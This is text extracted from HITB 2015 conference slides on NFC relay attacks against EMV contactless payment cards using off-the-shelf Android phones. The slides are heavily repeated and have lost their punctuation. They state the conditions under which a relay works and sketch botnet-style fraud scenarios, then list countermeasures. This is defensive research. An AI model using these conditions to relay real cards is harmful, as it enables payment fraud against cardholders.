J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
